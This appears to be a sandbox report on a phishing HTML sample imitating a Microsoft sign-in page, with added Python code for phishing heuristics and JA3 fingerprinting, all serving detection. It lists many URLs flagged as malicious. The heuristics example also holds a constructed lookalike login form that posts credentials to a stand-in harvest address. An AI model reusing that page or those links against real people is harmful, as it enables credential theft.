Automated Malware Analysis Report for ...

ID: 150203 Sample Name: CUsersadminisratorDocumentspagesselfSENDERSharedfile07092019_pdf.html2.html Cookbook: default.jbs Time: 03:21:16 Date: 09/07/2019 Version: 26.0.0 Aquamarine

Transcript of Automated Malware Analysis Report for ...


Table of Contents

Analysis Report CUsersadminisratorDocumentspagesselfSENDERSharedfile07092019_pdf.html2.html
  Overview
    General Information
    Detection
    Confidence
    Classification
    Analysis Advice
    Mitre Att&ck Matrix
    Signature Overview
      Phishing:
      Networking:
      System Summary:
    Behavior Graph
    Simulations
      Behavior and APIs
    Antivirus and Machine Learning Detection
      Initial Sample
      Dropped Files
      Unpacked PE Files
      Domains
      URLs
    Yara Overview
      Initial Sample
      PCAP (Network Traffic)
      Dropped Files
      Memory Dumps
      Unpacked PEs
    Joe Sandbox View / Context
      IPs
      Domains
      ASN
      JA3 Fingerprints
      Dropped Files
    Screenshots
      Thumbnails
  Startup
  Created / dropped Files
  Domains and IPs
    Contacted Domains
    URLs from Memory and Binaries
    Contacted IPs
      Public
  Static File Info
    General
    File Icon
  Network Behavior
    TCP Packets
    UDP Packets
    DNS Queries
    DNS Answers
    HTTPS Packets
  Code Manipulations
  Statistics
    Behavior
  System Behavior
    Analysis Process: iexplore.exe PID: 4576 Parent PID: 692
      General
      File Activities
      Registry Activities
    Analysis Process: iexplore.exe PID: 4256 Parent PID: 4576
      General
      File Activities
      Registry Activities
  Disassembly

Copyright Joe Security LLC 2019 Page 2 of 47


Analysis Report CUsersadminisratorDocumentspagesselfSENDERSharedfile07092019_pdf.html2.html

Overview

General Information

Joe Sandbox Version: 26.0.0 Aquamarine

Analysis ID: 150203

Start date: 09.07.2019

Start time: 03:21:16

Joe Sandbox Product: CloudBasic

Overall analysis duration: 0h 5m 10s

Hypervisor based Inspection enabled: false

Report type: light

Sample file name: CUsersadminisratorDocumentspagesselfSENDERSharedfile07092019_pdf.html2.html

Cookbook file name: default.jbs

Analysis system description: Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113

Number of new started processes analysed: 10

Number of new started drivers analysed: 0

Number of existing processes analysed: 0

Number of existing drivers analysed: 0

Number of injected processes analysed: 0

Technologies: HCA enabled, EGA enabled, HDC enabled, AMSI enabled

Analysis stop reason: Timeout

Detection: SUS

Classification: sus24.phis.winHTML@3/70@11/2


Cookbook Comments:

Adjust boot time
Enable AMSI
Found application associated with file extension: .html
Browsing link: https://login.microsoftonline.com/common/reprocess?ctx=rqiiaxwro2_tuacfc_mwlscowgdswary4nfiia4hcz2e2a6o3dzeitfx48bp2dee5bewihvg6oiekcompgqe2dtvgglwblqjcxvajkq_govmr5-ozvegrfbj5n2gzlirfsjjvmxromotbg4xfiftlm3rfefowilo7lzfqu--tj7_edr9-epg4olyy6ctcndhkm2btdpisagmrgttp2onue0ughmafgjwxkw4ma6ptoo5r3n1mugoxppg8stl81vju31f1blppsnpakizeormsaub5jhs9cmsrj2stulk7juhfommmtvyrbmxskdhzsepldzbmoiuhozvhvkaoyh7vjqnlszkwmmrtn4r3lzac-rtv5fkcovcfjfdjivgazkj49jbokro3ju0kzh2bfs9qjkxgrafybipsyr1mgsdfkc1u-xeloxandmsgs8yj4lnasferoiqoc8m6p5gisfyzgxmpwt2ypyzltoipzakmjuyfg_dgfve16h2ifbg0l6wtdnz2a_gjs6sndzasqgof0an-mfjxqwent1osky59zx3tpwprfb9cvvfgixxwenwelqmj9tplrgwdm7l4kj8kyg1nzawlxcvsf34wwavk2tbvwz3o2rg4hv--6j06rrwvqk9hkhhbhrnacojwb9iklkppfx1ushz7_azrsapi5xvemoy2wga5begjjdsnwzexct82pyf6381#
Browsing link: https://login.live.com/oauth20_authorize.srf?response_type=code&client_id=51483342-085c-4d86-bf88-cf50c7252078&scope=openid+profile+email+offline_access&response_mode=form_post&redirect_uri=https%3a%2f%2flogin.microsoftonline.com%2fcommon%2ffederation%2foauth2&state=rqiiaxwsvw_tubtf4yqnbufqisqyozcbndw_fyso6fba10mj7edybe0lch1_vpgzzmtd8hewihvgyoiekcompgqe2dtvgqmsdkgseuqaghhzu9zlnvpt1tn3uymqus2hdm2wvn2fj3mlo0mgpwbpmzajazbmaaioaqvo7o7ycn7_bfdlz5pwqx83oxexxz_piav-ia6dqp1ex8r9h-n03kzvjpnjnxfdzp9f1e4i4owgfhlevljgxkteoy6oozqr0wwhgzkz8htl81vju31f1blppmnpacizasbdadbrpeyapsesqenzg0tgrhlkkc4yq4nvnhuibory3pqjzqmau9xcnd2tum4zirjjs8ngasyemrzp1hnxjrj-gh14nzimzzzl4pkbzfe_tcz4xnphkkkttwcbsrw7nq5eyzwyi9vckim7wzi6guboeg19pmrtidwyolmnm17q7wuvaibeihgv0gctducwxwa6mjqjtjxaz7czltpavetfla1zi0dhx33ma3ajxdgwas-y2pks7az9k2spzfwozmfofein5n5txovc2240wnm88dx3nd3owughuiwpnuri09lt_kgydvbtlhfr6jyviyvylvbqli5wvoghhdxc3zlxzifv7pfhfplmshzlf--vxp8uthdqj1hosqgkodydcpyejcn1yfnvn-ts261tpivwymtmn0a3ztayjnvuiy4qld-v4ssbhy9l13v9vnwv_5cgcxgssquab1k5tw7-aw2&estsfed=1&uaid=64d4ac74f6bf483c8de40b4ceaf2d3bd&signup=1&lw=1&fl=easi2&fci=4345a7b9-9a63-4910-a426-35363201d503&mkt=en-us
Browsing link: https://www.microsoft.com/en-us/servicesagreement/
Browsing link: https://privacy.microsoft.com/en-us/privacystatement
Browsing link: file:///c:/users/user/desktop/cusersadminisratordocumentspagesselfsendersharedfile07092019_pdf.html2.html#


Detection

Strategy: Threshold
Score: 24
Range: 0 - 100
Reporting: (none)
Whitelisted: false

Warnings:

Exclude process from analysis (whitelisted): MpCmdRun.exe, sc.exe, ielowutil.exe, WMIADAP.exe, conhost.exe, CompatTelRunner.exe
TCP Packets have been reduced to 100
Excluded IPs from analysis (whitelisted): 2.19.38.59, 95.100.79.183, 205.185.208.52, 40.126.9.66, 40.126.9.6, 20.190.137.98, 40.126.9.8, 20.190.137.96, 13.107.246.10, 40.90.23.229, 40.90.23.224, 40.90.23.239, 20.190.129.1, 40.126.1.135, 40.126.1.167, 40.126.1.129, 23.54.112.134, 23.54.112.217, 23.10.249.10, 23.10.249.11, 152.199.19.160, 23.10.249.48, 23.10.249.27, 2.19.39.63, 152.199.19.161, 67.27.237.126, 8.248.125.254, 67.27.233.126, 67.27.235.126, 8.248.141.254, 93.184.221.240
Excluded domains from analysis (whitelisted): cds.s5x3j6q5.hwcdn.net, wut.smartscreen.microsoft.com, assets.onestore.ms.edgekey.net, wut.abuse.msa.microsoft.com.nsatc.net, i.s-microsoft.com.edgekey.net, uhf.microsoft.com.edgekey.net, e11290.dspg.akamaiedge.net, Edge-Prod-AMSr3.ctrl.t-0001.t-msedge.net, www.microsoft.com-c-3.edgekey.net, login.live.com, audownload.windowsupdate.nsatc.net, hlb.apr-52dd2-0.edgecastdns.net, standard.t-0001.t-msedge.net, acctcdnvzeuno.azureedge.net, acctcdnvzeuno.ec.azureedge.net, e10583.dspg.akamaiedge.net, uhf.microsoft.com, aadcdnoriginwus2.azureedge.net, secure.aadcdn.microsoftonline-p.com.edgekey.net, t-0001.t-msedge.net, assets.onestore.ms.akadns.net, c-s.cms.ms.akadns.net, account.msa.akadns6.net, aadcdnoriginwus2.afd.azureedge.net, e11095.dspg.akamaiedge.net, c.s-microsoft.com-c.edgekey.net, privacy.microsoft.com.edgekey.net, www.prd.aa.aadg.windows.net.nsatc.net, cs9.wpc.v0cdn.net, lgin.msa.trafficmanager.net, www.prd.aa.aadg.akadns.net, afd.t-0001.t-msedge.net, i.s-microsoft.com, a1449.dscg2.akamai.net, acctcdn.trafficmanager.net, wu.azureedge.net, www.prdtm.aadg.windows.net.nsatc.net, www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net, iecvlist.microsoft.com, go.microsoft.com, mscomajax.vo.msecnd.net, cs11.wpc.v0cdn.net, e13761.dscg.akamaiedge.net, auto.au.download.windowsupdate.com.c.footprint.net, wu.wpc.apr-52dd2.edgecastdns.net, cs22.wpc.v0cdn.net, ie9comview.vo.msecnd.net, wu.ec.azureedge.net, ctldl.windowsupdate.com, www.prdtm.aadg.akadns.net, c.s-microsoft.com, privacy.microsoft.com, go.microsoft.com.edgekey.net, a849.dscg2.akamai.net, fe-bl02p-msa.trafficmanager.net, e13678.dscg.akamaiedge.net, www.microsoft.com, e13678.dspb.akamaiedge.net
Report size getting too big, too many NtDeviceIoControlFile calls found.


Confidence

Strategy: Threshold
Score: 4
Range: 0 - 5
Further Analysis Required?: false

Analysis Advice

Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis

Classification

(Classification chart not reproduced in this transcript. It rates the sample on a clean / suspicious / malicious scale for each category: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner. The resulting label, sus24.phis.winHTML@3/70@11/2, is given under General Information above.)

Mitre Att&ck Matrix

(Flattened from the report's 11-column matrix, one line per tactic. Techniques followed by a count were matched by signatures in this analysis; the remaining entries are the matrix's default placeholder cells.)

Initial Access: Valid Accounts; Replication Through Removable Media; Drive-by Compromise
Execution: Windows Remote Management; Service Execution; Windows Management Instrumentation
Persistence: Winlogon Helper DLL; Port Monitors; Accessibility Features
Privilege Escalation: Port Monitors; Accessibility Features; Path Interception
Defense Evasion: File System Logical Offsets; Binary Padding; Rootkit
Credential Access: Credential Dumping; Network Sniffing; Input Capture
Discovery: File and Directory Discovery (1); Application Window Discovery; Query Registry
Lateral Movement: Application Deployment Software; Remote Services; Windows Remote Management
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive
Exfiltration: Data Encrypted (1); Exfiltration Over Other Network Medium; Automated Exfiltration
Command and Control: Standard Cryptographic Protocol (2); Standard Non-Application Layer Protocol (2); Standard Application Layer Protocol (2)

Signature Overview

• Phishing

• Networking

• System Summary


Phishing:

Phishing site detected (based on favicon image match)

Found iframes

HTML body contains low number of good links

HTML title does not match URL

None HTTPS page querying sensitive user data (password, username or email)

Submit button contains javascript call

Suspicious form URL found

META author tag missing

META copyright tag missing
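The Phishing signatures above are static checks on the HTML itself, so they can be reproduced on a saved sample without a sandbox. The following Python is an added example, not code from the report or from Joe Security: it re-implements eight of the nine signatures with the standard library (the favicon match is skipped because it needs a brand favicon database). The brand vocabulary, the "good link" threshold, the definition of a suspicious form URL (a form whose action targets a host other than the page's own) and both sample pages are assumptions made for the demonstration.

```python
"""Static phishing heuristics for a saved HTML sample.

Added example, not code from the Joe Sandbox report or from Joe Security.
BRAND_WORDS, MIN_GOOD_LINKS, the meaning of a 'suspicious' form URL and
both sample pages are assumptions made for this demonstration.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

BRAND_WORDS = {"microsoft", "office", "onedrive", "outlook"}   # assumed brand vocabulary
SENSITIVE_INPUTS = {"password", "email"}                        # input types treated as sensitive
MIN_GOOD_LINKS = 5                                              # assumed threshold


class _Collector(HTMLParser):
    """Gather title, meta names, forms, links, iframes and javascript submit handlers."""

    def __init__(self):
        super().__init__()
        self.title, self._in_title = [], False
        self.meta_names = set()
        self.forms = []                     # each: {"action": str, "inputs": [input types]}
        self.links, self.iframes, self.js_submit = [], 0, False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}          # parser lower-cases attribute names
        has_js_handler = any(k.startswith("on") for k in a)
        if tag == "title":
            self._in_title = True
        elif tag == "meta":
            self.meta_names.add(a.get("name", "").lower())
        elif tag == "form":
            self.forms.append({"action": a.get("action", ""), "inputs": []})
        elif tag == "input":
            itype = a.get("type", "text").lower()
            if self.forms:
                self.forms[-1]["inputs"].append(itype)
            if itype == "submit" and has_js_handler:
                self.js_submit = True
        elif tag == "button" and has_js_handler:
            self.js_submit = True
        elif tag == "a":
            self.links.append(a.get("href", ""))
        elif tag == "iframe":
            self.iframes += 1

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False

    def handle_data(self, data):
        if self._in_title:
            self.title.append(data)


def phishing_signatures(html, page_url):
    """Return the signature names (in the report's order) that fire on `html` loaded from `page_url`."""
    c = _Collector()
    c.feed(html)
    page = urlparse(page_url)
    hits = []
    if c.iframes:
        hits.append("Found iframes")
    good_links = [h for h in c.links if urlparse(h).scheme in ("http", "https")]
    if len(good_links) < MIN_GOOD_LINKS:
        hits.append("HTML body contains low number of good links")
    title = " ".join(c.title).lower()
    brands_in_title = {w for w in BRAND_WORDS if w in title}
    if brands_in_title and not any(w in page.netloc.lower() for w in brands_in_title):
        hits.append("HTML title does not match URL")
    non_https_sensitive = suspicious_form = False
    for f in c.forms:
        target = urlparse(f["action"])
        scheme = target.scheme or page.scheme       # relative action inherits the page's scheme/host
        host = target.netloc or page.netloc
        if SENSITIVE_INPUTS & set(f["inputs"]) and scheme != "https":
            non_https_sensitive = True
        if host != page.netloc:                     # credentials leave for a foreign host
            suspicious_form = True
    if non_https_sensitive:
        hits.append("None HTTPS page querying sensitive user data (password, username or email)")
    if c.js_submit:
        hits.append("Submit button contains javascript call")
    if suspicious_form:
        hits.append("Suspicious form URL found")
    if "author" not in c.meta_names:
        hits.append("META author tag missing")
    if "copyright" not in c.meta_names:
        hits.append("META copyright tag missing")
    return hits


# Constructed lookalike login page, opened from disk like the report's sample (not the real sample).
PHISH_HTML = """<!doctype html><html><head><meta charset="utf-8">
<title>Sign in to your account - Microsoft</title></head><body>
<iframe src="https://login.microsoftonline.com/" width="0" height="0"></iframe>
<form method="post" action="http://203.0.113.10/harvest.php">
<input type="email" name="loginfmt"><input type="password" name="passwd">
<input type="submit" value="Next" onclick="javascript:document.forms[0].submit()"></form>
<a href="https://www.microsoft.com/en-us/servicesagreement/">Terms of use</a>
<a href="https://privacy.microsoft.com/en-us/privacystatement">Privacy</a></body></html>"""
PHISH_URL = "file:///C:/Users/user/Desktop/Sharedfile_pdf.html"

# Constructed benign sign-in page for comparison.
CLEAN_HTML = """<!doctype html><html><head><meta charset="utf-8"><title>Sign in - Example Corp</title>
<meta name="author" content="Example Corp"><meta name="copyright" content="Example Corp"></head><body>
<form method="post" action="/signin"><input type="email" name="user"><input type="password" name="pass">
<button type="submit">Sign in</button></form>
<a href="https://login.example.com/help">Help</a><a href="https://login.example.com/reset">Reset</a>
<a href="https://www.example.com/">Home</a><a href="https://www.example.com/terms">Terms</a>
<a href="https://www.example.com/privacy">Privacy</a></body></html>"""
CLEAN_URL = "https://login.example.com/signin"

if __name__ == "__main__":
    print(phishing_signatures(PHISH_HTML, PHISH_URL))
    print(phishing_signatures(CLEAN_HTML, CLEAN_URL))
```

On the constructed lookalike page every implemented signature fires, on the benign page none does; the relative form action and the meta tags are what separate them, which is why the report lists the missing META author/copyright tags as weak supporting evidence rather than a verdict on their own.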

Networking:

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Found strings which match to known social media urls

Performs DNS lookups

Urls found in memory or binary data

Uses HTTPS
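The JA3 signature above pivots on an MD5 computed over fields of the TLS ClientHello, so the same pivot can be reproduced from a PCAP. The following Python is an added example, not code from the report: it builds a ClientHello and derives its JA3 string and hash the way the fingerprint is defined (SSLVersion, Ciphers, Extensions, EllipticCurves, EllipticCurvePointFormats joined with commas, list items joined with dashes, GREASE values dropped). The ClientHello bytes and the cipher and extension choices are constructed for the demonstration and are not taken from the report's capture.

```python
"""JA3 client fingerprint from a TLS ClientHello.

Added example, not part of the Joe Sandbox report. The ClientHello below
is constructed for the demonstration; it is not from the report's capture.
"""
import hashlib
import struct


def _u16(v):
    return struct.pack("!H", v)


def build_client_hello(version, ciphers, extensions):
    """Assemble a minimal TLS record carrying a ClientHello (constructed test input).

    `extensions` is a list of (type, body_bytes) pairs.
    """
    body = _u16(version) + bytes(32)            # client_version + random (zeros for the demo)
    body += b"\x00"                             # empty session id
    body += _u16(2 * len(ciphers)) + b"".join(_u16(c) for c in ciphers)
    body += b"\x01\x00"                         # one compression method: null
    ext = b"".join(_u16(t) + _u16(len(b)) + b for t, b in extensions)
    body += _u16(len(ext)) + ext
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body
    return b"\x16" + _u16(0x0303) + _u16(len(handshake)) + handshake


def _is_grease(v):
    """GREASE values (RFC 8701) look like 0x?a?a with both bytes equal; JA3 drops them."""
    return (v & 0x0F0F) == 0x0A0A and (v >> 8) == (v & 0xFF)


def ja3(record):
    """Return (ja3_string, ja3_md5) for a TLS record that contains a ClientHello."""
    if record[0] != 0x16:
        raise ValueError("not a TLS handshake record")
    hs = record[5:]
    if hs[0] != 0x01:
        raise ValueError("not a ClientHello")
    pos = 4                                      # skip handshake type + 3-byte length
    version = int.from_bytes(hs[pos:pos + 2], "big")
    pos += 2 + 32                                # version, random
    pos += 1 + hs[pos]                           # session id
    n = int.from_bytes(hs[pos:pos + 2], "big")
    pos += 2
    ciphers = [int.from_bytes(hs[i:i + 2], "big") for i in range(pos, pos + n, 2)]
    pos += n
    pos += 1 + hs[pos]                           # compression methods
    end = pos + 2 + int.from_bytes(hs[pos:pos + 2], "big")
    pos += 2
    ext_types, curves, formats = [], [], []
    while pos < end:
        etype = int.from_bytes(hs[pos:pos + 2], "big")
        elen = int.from_bytes(hs[pos + 2:pos + 4], "big")
        body = hs[pos + 4:pos + 4 + elen]
        pos += 4 + elen
        ext_types.append(etype)
        if etype == 0x000A:                      # supported_groups (elliptic curves)
            m = int.from_bytes(body[:2], "big")
            curves = [int.from_bytes(body[i:i + 2], "big") for i in range(2, 2 + m, 2)]
        elif etype == 0x000B:                    # ec_point_formats
            formats = list(body[1:1 + body[0]])
    fields = [
        str(version),
        "-".join(str(c) for c in ciphers if not _is_grease(c)),
        "-".join(str(e) for e in ext_types if not _is_grease(e)),
        "-".join(str(c) for c in curves if not _is_grease(c)),
        "-".join(str(f) for f in formats),
    ]
    s = ",".join(fields)
    return s, hashlib.md5(s.encode()).hexdigest()


# Constructed ClientHello: TLS 1.2 with a GREASE entry in every list (as browsers send).
SAMPLE_HELLO = build_client_hello(
    0x0303,
    [0x0A0A, 0x1301, 0x1302, 0xC02B, 0xC02F],
    [
        (0x0A0A, b""),                                        # GREASE extension
        (0x0000, b"\x00\x0e\x00\x00\x0bexample.com"),         # server_name: example.com
        (0x000A, b"\x00\x06" + _u16(0x0A0A) + _u16(0x001D) + _u16(0x0017)),  # GREASE, x25519, P-256
        (0x000B, b"\x01\x00"),                                # point formats: uncompressed
    ],
)

if __name__ == "__main__":
    print(*ja3(SAMPLE_HELLO))
```

Because GREASE values are stripped, a client that randomises them still yields one stable JA3, which is what makes the "seen in connection with other malware" pivot usable; the same stripping also means two different clients sharing a TLS stack collide, so treat a JA3 match as a lead rather than attribution.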


System Summary:

Classification label

Creates files inside the user directory

Creates temporary files

Reads ini files

Spawns processes

Found graphical window changes (likely an installer)

Uses new MSVCR Dlls

Behavior Graph

(Graph image not reproduced in this transcript; the node data that survived extraction follows.)

ID: 150203
Sample: CUsersadminisratorDocuments...
Startdate: 09/07/2019
Architecture: WINDOWS
Score: 24

Process nodes: iexplore.exe (badges 6, 84) started iexplore.exe (badge 104)

Network nodes:
secure.aadcdn.microsoftonline-p.com: Phishing site detected (based on favicon image match)
aa-hip-prod.southcentralus.cloudapp.azure.com: 104.215.74.84, 443, 49733, 49734; ASN unknown; United States
cs1227.wpc.alphacdn.net: 192.229.221.185, 443, 49725, 49726; ASN unknown; United States
13 other IPs or domains

Legend: Process, Signature, Created File, DNS/IP Info, Is Dropped, Is Windows Process, Number of created Registry Values, Number of created Files, Visual Basic, Delphi, Java, .Net C# or VB.NET, C, C++ or other language, Is malicious, Internet

Simulations

Behavior and APIs

No simulations

Antivirus and Machine Learning Detection

Initial Sample

Source Detection Scanner Label Link
CUsersadminisratorDocumentspagesselfSENDERSharedfile07092019_pdf.html2.html 6% virustotal Browse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source Detection Scanner Label Link
https://login.microsof/Desktop/CUsersadminisratorDocumentspagesselfSENDERSharedfile07092019_pdf.html 0% Avira URL Cloud safe
https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/ux.converged.error.core.min_2y6puv-fhesw6oymb- 0% Avira URL Cloud safe
https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/ux.converged.error.strings-en.min_xqvbwocyraoe 0% Avira URL Cloud safe

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Joe Sandbox View / Context

IPs

Match Associated Sample Name / URL SHA 256 Detection Link Context

192.229.221.185 Skype Business VM.pdf Get hash malicious Browse

https://jglshop.com.br/?y=ZGFtaWVuY0BhdXN0cmFsaWFuYmFsbGV0LmNvbS5hdQ==&data=02|01|[email protected]|0ada4032a36546c6d13b08d6ac0f8494|363ab79152b7474a91175bf36bde2b94|0|0|636885580035963490&sdata=+0eEs7qSCBrK5wHALHN4ZON9LKqFQEk8Liayanza9jQ=&reserved=0

Get hash malicious Browse


New Seccure File 7.24.05 PM.xlsx Get hash malicious Browse

https://storage.googleapis.com/aoffice365-journalistically-202255390/index.html

Get hash malicious Browse

Ceisa Semo Proposal.pdf Get hash malicious Browse

hasib-musinbegovic.com/wp-includes/OneDrive/Secure/home.html

Get hash malicious Browse

https://1drv.ms/b/s!Ai3YLFZQP4zmgnQbLlTwyMGNlcOa Get hash malicious Browse

https://login-microsoftonline-com0compliance-security-alert.ml/sharepoint-online-policies/

Get hash malicious Browse

https://u10520081.ct.sendgrid.net/wf/click?upn=jYlCtn5-2BPW5ucXpaCyqStVH3HEQUa2UKlpMzTVoldFM-3D_9mVef8XBOHUAB1Yp8VbE5b6cE7OrBvd4swG8dKZc1sPHvUY2cvsa2domirFVgsA7wTpafr9ZcbLjQDgrwzRN1Sfz5gUDTAosURfQrkaiHQa9xhTrZ7vxiPsOVhaDJBvhQGmXib5DzN3yHHWyi1-2Bs4dHWxanwSL0UHC4LH5kW-2BXt-2F7dR3iEvUlCpV-2Bigo7RxS8gDytzsBNig0TTG2iACzti9Cn3fcuAB9gNnTJ0mFlqA-3D

Get hash malicious Browse

https://1drv.ms/b/s!AhJu8bKGuybLclKouKsoIXrGDx8 Get hash malicious Browse

https://user7779793e792782.z14.web.core.windows.net/index.htm?=en-US&[email protected]

Get hash malicious Browse

login.live.com.office.flagstarbancorp.myshn.net Get hash malicious Browse

https://aus01.safelinks.protection.outlook.com/?url=https%3A%2F%2Fonedrive.live.com%2Fredir%3Fresid%3D429413BE603FA343!5758%26authkey%3D!ABt3LPTU6MynWOk%26ithint%3Dfile%252cdocx&data=02%7C01%7Cdamienc%40australianballet.com.au%7Cf3dff5c1c69746509e0c08d6ef0bf767%7C363ab79152b7474a91175bf36bde2b94%7C0%7C0%7C636959232091196729&sdata=9I2tuU2dOpmt0o7AgOaq9Wuz9mjMhKAd7LA55pbkQqQ%3D&reserved=0

Get hash malicious Browse

https://1drv.ms/b/s!AvO7bN5acODYawc9teh52z5A8HI?e=3T7pcW

Get hash malicious Browse

https://outlookloffice365user23k-secondary.z14.web.core.windows.net/d41d8cd98f00b204e9800998ecf8427e89de54095edc1a5eb8c27bdf9c492019/89de54095edc1a5eb8c27bdf9c492019/#[email protected]

Get hash malicious Browse

https://onedrive.live.com/?authkey=%21AGoRsXinDPWY5Mc&cid=4694365C78123852&id=4694365C78123852%21134&parId=root&o=OneUp

Get hash malicious Browse

www.housewittorp.com/wp-includes/images/crystal/of_nw/of_nw20-10-2019/off.sss/786f23d16213fff8ba639cedee5f69a8/login.htm?cmd=login_submit&id=bbe3bfe87c61dd28e1a018fb1af599aabbe3bfe87c61dd28e1a018fb1af599aa&session=bbe3bfe87c61dd28e1a018fb1af599aabbe3bfe87c61dd28e1a018fb1af599aa

Get hash malicious Browse

https://943d.app.link/ Get hash malicious Browse

https://protection.office.com/threatexplorer#/threatexplorer?dltarget=Explorer&dlstorage=Url&viewid=allemail&query-CanonicalizedUrl=https://onedrive.live.com/?authkey=%21AKOGMaypqRvjuxE&cid=30A2F54D2B9B8460&id=30A2F54D2B9B8460%21170&parId=root&o=OneUp

Get hash malicious Browse

CRY INV#98634.htm Get hash malicious Browse

104.215.74.84 #43409.htm Get hash malicious Browse

email.veromailer.com/c/eJxdkMFugzAQRL8GLlGQbSDAgUPaJJdKVQ-VckSOvYFNjU1th6h_X0OVlFbyYTUz3nlawfuBY6uj_MmCwAFB-0aanmOQdvXPlAjTx-I3CUFUjbueLiD8FDuCChGIZc3TklTL7Mgtco9mXvdstLdGxVgzQitCaUEpI_kmocmuymlOM7LPSEqzwz7KyAh2qldgZ4CuFqUs5AkyCC2QZtU5o1IUrKCFZJJzuuxd0EWsfLMwItwiVq3urKruvB9clG4jdghPmRb12nXcwmBQ-3STa-PxjGLGd0n7GVLmHAQI3jrQPcxgxLb-uFreG4UjBPh2Iv9_uMGaCarRvIeJ7OUCynVXtzpy16FuvdGrd2OUW37yX8McfoWbU-A92D8u9IPiHh47l-Z9bFBOVp4WZcG-AZIwqJQ

Get hash malicious Browse


email.veromailer.com/c/eJxdkMFugzAQRL8GLlGQbSDAgUPaJJdKVQ-VckSOvYFNjU1th6h_X0OVlFbyYTUz3nlawfuBY6uj_MmCwAFB-0aanmOQdvXPlAjTx-I3CUFUjbueLiD8FDuCChGIZc3TklTL7Mgtco9mXvdstLdGxVgzQitCaUEpI_kmocmuymlOM7LPSEqzwz7KyAh2qldgZ4CuFqUs5AkyCC2QZtU5o1IUrKCFZJJzuuxd0EWsfLMwItwiVq3urKruvB9clG4jdghPmRb12nXcwmBQ-3STa-PxjGLGd0n7GVLmHAQI3jrQPcxgxLb-uFreG4UjBPh2Iv9_uMGaCarRvIeJ7OUCynVXtzpy16FuvdGrd2OUW37yX8McfoWbU-A92D8u9IPiHh47l-Z9bFBOVp4WZcG-AZIwqJQ

Get hash malicious Browse

https://exchange3564.xyz/.d/?email Get hash malicious Browse

Skype Business VM.pdf Get hash malicious Browse

https://u10269907.ct.sendgrid.net/wf/click?upn=7TnevfDNdxZp2Q3ysQ7X3oESB0-2FDPAHHGrCSuhANFl0RiIaXTQqc14zMc-2FpX9M8w_fxDop4UK-2FXWtvz-2Fo4SgBilCRDsINTKa-2BV6WoX7TCamBzN4Y3OFVxfYIFnMjo2oF0yanJFKyei-2FKbXVFZy2wWdw2BISVfQ0uuj040ducQ3e4x0ReqX-2BeavUyA3qBOBoptIxux6KHZnY0imx8tUJ6aPUBf7V4AQsKN3qI-2FJUs5ka5TGYo3JtEVvh56ieL-2BftMts8GVieoN5pgiQgMOSfl-2FS3as8UhjMRUwml-2Btsxw6bkw-3D

Get hash malicious Browse

86741.com/image/index.html Get hash malicious Browse

https://storage.googleapis.com/aoffice365-journalistically-202255390/index.html

Get hash malicious Browse

hasib-musinbegovic.com/wp-includes/OneDrive/Secure/home.html

Get hash malicious Browse

https://login-microsoftonline-com0compliance-security-alert.ml/sharepoint-online-policies/

Get hash malicious Browse

https://u10520081.ct.sendgrid.net/wf/click?upn=jYlCtn5-2BPW5ucXpaCyqStVH3HEQUa2UKlpMzTVoldFM-3D_9mVef8XBOHUAB1Yp8VbE5b6cE7OrBvd4swG8dKZc1sPHvUY2cvsa2domirFVgsA7wTpafr9ZcbLjQDgrwzRN1Sfz5gUDTAosURfQrkaiHQa9xhTrZ7vxiPsOVhaDJBvhQGmXib5DzN3yHHWyi1-2Bs4dHWxanwSL0UHC4LH5kW-2BXt-2F7dR3iEvUlCpV-2Bigo7RxS8gDytzsBNig0TTG2iACzti9Cn3fcuAB9gNnTJ0mFlqA-3D

Get hash malicious Browse

https://user7779793e792782.z14.web.core.windows.net/index.htm?=en-US&[email protected]

Get hash malicious Browse

parsintelligent.com/layouts/joomla/content/OFFICE01/office.htm

Get hash malicious Browse

email.veromailer.com/c/eJxdkMFugzAQRL8GLlGQbSDAgUPaJJdKVQ-VckSOvYFNjU1th6h_X0OVlFbyYTUz3nlawfuBY6uj_MmCwAFB-0aanmOQdvXPlAjTx-I3CUFUjbueLiD8FDuCChGIZc3TklTL7Mgtco9mXvdstLdGxVgzQitCaUEpI_kmocmuymlOM7LPSEqzwz7KyAh2qldgZ4CuFqUs5AkyCC2QZtU5o1IUrKCFZJJzuuxd0EWsfLMwItwiVq3urKruvB9clG4jdghPmRb12nXcwmBQ-3STa-PxjGLGd0n7GVLmHAQI3jrQPcxgxLb-uFreG4UjBPh2Iv9_uMGaCarRvIeJ7OUCynVXtzpy16FuvdGrd2OUW37yX8McfoWbU-A92D8u9IPiHh47l-Z9bFBOVp4WZcG-AZIwqJQ

Get hash malicious Browse

https://xoaoomoaiaopeamoznoiaib.appspot.com/bdsa/ Get hash malicious Browse

email.veromailer.com/c/eJxdkMFugzAQRL8GLlGQbSDAgUPaJJdKVQ-VckSOvYFNjU1th6h_X0OVlFbyYTUz3nlawfuBY6uj_MmCwAFB-0aanmOQdvXPlAjTx-I3CUFUjbueLiD8FDuCChGIZc3TklTL7Mgtco9mXvdstLdGxVgzQitCaUEpI_kmocmuymlOM7LPSEqzwz7KyAh2qldgZ4CuFqUs5AkyCC2QZtU5o1IUrKCFZJJzuuxd0EWsfLMwItwiVq3urKruvB9clG4jdghPmRb12nXcwmBQ-3STa-PxjGLGd0n7GVLmHAQI3jrQPcxgxLb-uFreG4UjBPh2Iv9_uMGaCarRvIeJ7OUCynVXtzpy16FuvdGrd2OUW37yX8McfoWbU-A92D8u9IPiHh47l-Z9bFBOVp4WZcG-AZIwqJQ

Get hash malicious Browse

https://similarities.ga/aim/redirect.php Get hash malicious Browse

